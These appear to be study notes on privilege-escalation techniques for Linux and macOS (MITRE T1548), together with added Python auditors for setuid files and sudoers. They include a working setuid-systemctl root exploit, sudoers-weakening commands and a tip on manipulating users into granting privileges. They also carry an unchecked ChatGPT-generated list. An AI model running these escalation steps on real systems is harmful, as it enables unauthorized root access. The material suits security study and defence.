Linux & macOS
Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/001/
Setuid and setgid bits set in UNIX.
chmod u+s [file] or chmod 4777 [file] sets the setuid bit (note that 4777 also makes the file world-writable; 4755 is the usual form). To enable the setgid bit, chmod 2775 or chmod g+s can be used. Look for the files with the bit set:
find / -perm +4000 2>/dev/null for the setuid bit and
find / -perm +2000 2>/dev/null for the setgid bit. The +mode form is accepted by the BSD find shipped with macOS; modern GNU find on Linux rejects it, so use -perm -4000 / -perm -2000 (or -perm /4000 / -perm /2000) there.
When a user runs an executable file with the setuid bit set, the real user ID (RUID) of the process is set to the user ID of the user who ran the file, while the effective user ID (EUID) is set to the user ID of the file owner. This means that the process runs with the privileges of the file owner while still retaining the identity of the user who executed the file.
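The find commands above list every file with the bit set, but on a real host that list is long and mostly legitimate. What a defender wants is the difference from a known-good baseline, so a stray setuid systemctl stands out. The script below is an added example (not from the original notes): it walks a tree, collects every regular file with the setuid and/or setgid bit using the same mode test find applies, and reports the ones missing from a baseline set. The baseline and the directory layout in demo() are constructed for the example; a real baseline would be recorded from a trusted, freshly built host.

```python
"""Audit a directory tree for setuid/setgid executables and flag any that are
not on a known-good baseline. Added example, not part of the original notes."""
import os
import stat
import tempfile


def find_set_id_files(root):
    """Return a sorted list of (path, kind) for every regular file under `root`
    whose mode has the setuid and/or setgid bit, i.e. what
    `find root -perm /6000` (GNU syntax) would print, plus which bit it was."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished: skip rather than abort the scan
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets and devices are not relevant here
            kinds = []
            if st.st_mode & stat.S_ISUID:
                kinds.append("setuid")
            if st.st_mode & stat.S_ISGID:
                kinds.append("setgid")
            if kinds:
                hits.append((path, "+".join(kinds)))
    return sorted(hits)


def unexpected_set_id_files(root, baseline):
    """Files with a set-id bit that are not in `baseline`: the review queue.
    `baseline` is a set of absolute paths recorded from a trusted host."""
    return [(p, k) for p, k in find_set_id_files(root) if p not in baseline]


def demo():
    """Build a constructed tree (hypothetical paths, not a real system) with a
    few 'binaries' and return what the audit flags, as (basename, kind)."""
    with tempfile.TemporaryDirectory() as tmp:
        bindir = os.path.join(tmp, "usr", "bin")
        os.makedirs(bindir)
        # passwd and wall are expected set-id files; systemctl with setuid is the
        # misconfiguration discussed in the text; ls is a plain 0755 binary.
        for name, mode in (("passwd", 0o4755), ("systemctl", 0o4755),
                           ("ls", 0o755), ("wall", 0o2755)):
            path = os.path.join(bindir, name)
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(path, mode)
        baseline = {os.path.join(bindir, "passwd"), os.path.join(bindir, "wall")}
        flagged = unexpected_set_id_files(tmp, baseline)
        return [(os.path.basename(p), k) for p, k in flagged]


if __name__ == "__main__":
    for name, kind in demo():
        print(f"REVIEW: {name} has the {kind} bit set and is not in the baseline")
```

Running the script prints one line for the stray setuid systemctl and nothing for the baseline entries. For a real host, point find_set_id_files at "/" and feed a baseline generated the same way on a clean build; a change in that diff is the detection signal for this technique.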
One of the files with this bit set is systemctl. This process is used to start services, for example, an apache server:
sudo systemctl start apache2. However, if this file is assigned SUID permissions by mistake, it can be used for privilege escalation.
eop=$(mktemp).service   # create a temp file with a random unique name and store the name in the eop variable
echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop   # write the config for the service into the file; systemctl will use this unit file to run the process given in ExecStart
# ❗️ Do not copy this code in whole; enter it line by line, without the > sign, or else you will not get it to work
# ❗️ I have added touch $eop but it's not required (it was in my case, cause I had an error)
/bin/systemctl link $eop   # creates a symbolic link to the unit file named in $eop under /etc/systemd/system/, so the service can be managed with systemctl commands
/bin/systemctl enable --now $eop   # enables the service (so it starts at boot) and, because of --now, starts it immediately
Below is the list generated by ChatGPT (to validate) that shows other executables with this bit set that are potentially useful to the attacker:
/usr/bin/passwd: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges.
/usr/bin/chsh: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges.
/usr/bin/chfn: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges.
/usr/bin/sudo: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.
/usr/bin/sudoedit: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.
Mitigation: Don’t set this bit on binaries with known shell escape vulnerabilities.
Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/003/
One can add admin ALL=(ALL) NOPASSWD: ALL to the
Also, malware might monitor /var/db/sudo (where sudo keeps its timestamp) for a valid timestamp and execute when one is present.
Also, it's possible to disable terminal window isolation (per-tty tickets), like this:
echo 'Defaults !tty_tickets' >> /etc/sudoers.
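Both weakenings above live in sudoers text, so they can be caught by a configuration audit before anyone relies on the timestamp. The script below is an added example (not from the original notes): a small sudoers reader that joins continuation lines, ignores comments, and reports NOPASSWD grants (ALL as high, specific commands as medium, for review) and a disabled tty_tickets default. SAMPLE_SUDOERS is a constructed input; the regexes cover the common Defaults and user-spec shapes and do not follow @include/#includedir directives.

```python
"""Audit sudoers text for passwordless grants and for 'Defaults !tty_tickets'.
Added example with a constructed input; not part of the original notes."""
import re

# Constructed sample, not a real host's sudoers file.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        !tty_tickets
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
admin   ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, \\
                             /usr/bin/systemctl status app
"""

# Defaults line, optionally scoped: Defaults:user, Defaults@host, Defaults>runas, Defaults!cmd
DEFAULTS = re.compile(r"^Defaults(?:[:@>!]\S+)?\s+(?P<opts>.+)$")
# user spec: who hosts = (runas) [tags] command, command, ...
USER_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
# tags that may prefix a command; PASSWD/NOPASSWD stay in effect for the rest of the list
TAG = re.compile(
    r"^(?P<tag>(?:NO)?(?:PASSWD|EXEC|SETENV|MAIL|FOLLOW|INTERCEPT|LOG_INPUT|LOG_OUTPUT)):\s*")


def logical_lines(text):
    """Yield sudoers lines with backslash continuations joined and comment or
    blank lines dropped (this also skips #include/#includedir directives)."""
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if line and not line.startswith("#"):
            yield line


def audit_sudoers(text):
    """Return a list of (severity, subject, message) findings, in file order."""
    findings = []
    for line in logical_lines(text):
        d = DEFAULTS.match(line)
        if d:
            for opt in (o.strip() for o in d.group("opts").split(",")):
                if opt == "!tty_tickets":
                    findings.append(("high", "Defaults",
                                     "tty_tickets disabled: a cached sudo credential is usable "
                                     "from every terminal of that user, not only the one that "
                                     "authenticated"))
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        nopasswd = False
        for entry in (e.strip() for e in m.group("cmds").split(",")):
            # peel off tags; remember the PASSWD/NOPASSWD state across the list
            while True:
                t = TAG.match(entry)
                if not t:
                    break
                if t.group("tag") == "NOPASSWD":
                    nopasswd = True
                elif t.group("tag") == "PASSWD":
                    nopasswd = False
                entry = entry[t.end():]
            if nopasswd and entry == "ALL":
                findings.append(("high", m.group("who"), "passwordless sudo for ALL commands"))
            elif nopasswd:
                findings.append(("medium", m.group("who"),
                                 f"passwordless sudo for {entry}; review the binary for shell escapes"))
    return findings


if __name__ == "__main__":
    for severity, subject, message in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{severity}] {subject}: {message}")
```

On the sample this yields four findings: the disabled tty_tickets default, the admin NOPASSWD: ALL line, and one medium entry per deploy command. Run it against the concatenation of /etc/sudoers and the files in /etc/sudoers.d on a host (read as root, e.g. via visudo -c style review tooling) to get the same view.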
Platforms: macOS MITRE: https://attack.mitre.org/techniques/T1548/004/
AuthorizationExecuteWithPrivileges API (macOS). Set the preferences to block all programs not downloaded from the App Store. Basically, it brings up a prompt and asks the user to grant the permissions. The trick is to be convincing enough so that the user grants the permissions.
Mitigations: least privilege, proper configuration, defense in-depth, zero trust.
Platforms: Windows MITRE: https://attack.mitre.org/techniques/T1548/002/
Abusing UAC on Windows.